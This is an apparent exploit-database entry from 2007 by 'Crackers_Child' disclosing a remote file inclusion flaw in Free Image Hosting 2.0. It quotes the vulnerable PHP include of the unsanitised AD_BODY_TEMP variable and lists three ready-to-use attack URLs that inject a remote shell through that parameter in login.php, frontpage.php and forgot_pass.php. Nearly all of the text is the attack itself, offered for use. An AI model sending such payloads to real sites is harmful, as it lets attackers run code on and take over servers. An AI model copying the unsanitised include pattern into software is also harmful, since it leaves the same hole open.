[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
# Published : 2007-03-25
# Author : Crackers_Child
# Previous Title : Mambo Module Flatmenu <= 1.07 Remote File Include Exploit
# Next Title : PBlang <= 4.66z Remote Create Admin Exploit
############################################################################################
Baslik :Image_Upload Script Remote File Inclusion Exploit
Free Image Hosting 2.0
.ndir : http://free-php-scripts.net/scripts/Image_Upload.zip
Bulan :Crackers_Child
Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>
Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?
: www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?
:www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?
Not :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]
Greetz : EveryBody
############################################################################################
# www.Syue.com [2007-03-25]